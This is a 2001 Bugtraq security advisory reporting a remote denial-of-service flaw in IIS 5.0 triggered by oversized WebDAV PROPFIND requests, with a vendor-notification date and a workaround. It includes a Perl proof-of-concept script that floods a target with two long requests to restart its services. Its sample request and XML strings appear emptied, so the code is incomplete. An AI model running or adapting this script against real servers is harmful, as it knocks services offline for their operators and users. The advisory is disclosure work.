Return-Path: owner-bugtraq@SECURITYFOCUS.COM X-Mailer: Mozilla 4.76 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Message-ID: <3AA76427.FC0B7206@guninski.com> Date: Thu, 8 Mar 2001 12:51:19 +0200 Reply-To: Georgi Guninski Sender: Bugtraq List From: Georgi Guninski Subject: IIS 5.0 PROPFIND DOS To: BUGTRAQ@SECURITYFOCUS.COM Georgi Guninski security advisory #38, 2001 IIS 5.0 PROPFIND DOS Systems affected: IIS 5.0 Risk: Medium but may turn more serious Date: 8 March 2001 Legal Notice: This Advisory is Copyright (c) 2001 Georgi Guninski. You may distribute it unmodified. You may not modify it and distribute it or distribute parts of it without the author's written permission. Disclaimer: The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this advisory or program. Georgi Guninski bears no responsibility for content or misuse of this advisory or program or any derivatives thereof. Description: It is possible to remotely restart all IIS related service using specially crafted request. It is also possible to force IIS to consume memory which it does not free. Seems to be a buffer overflow, don't know whether it is exploitable, let me know if you find a way to exploit it. Details: Basically the problem are very long but valid propfind request. For example the following PROPFIND request works for me: --------------------- --------------------- where length($over) ~ 128008 The first time the request is send IIS replies with 500 ... Exception. The second time the services are restarted. --vv5.pl------------------------------------------------------------------------- #!/usr/bin/perl # Written by Georgi Guninski use IO::Socket; print "IIS 5.0 propfind\n"; $port = @ARGV[1]; $host = @ARGV[0]; sub vv() { $ll=$_[0]; #length of buffer $ch=$_[1]; $over=$ch x $ll; #string to overflow $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return; #$xml=''."".''."\n\n"; # ^^^^ This is another issue and also works with length ~>65000 $xml=''."".''."\n\n"; $l=length($xml); $req="PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n"; syswrite($socket,$req,length($req)); print "."; $socket->read($res,300); #print "r=".$res; close $socket; } do vv(128008,"V"); # may need to change the length sleep(1); do vv(128008,"V"); print "Done.\n"; --------------------------------------------------------------------------- Demonstration: Workoround: Disable WebDav extensions and PROPFIND though I do not recommend using IIS on the Internet. Vendor status: Microsoft was informed on 3 March 2001 Happy 8 March to the women. Regards, Georgi Guninski http://www.guninski.com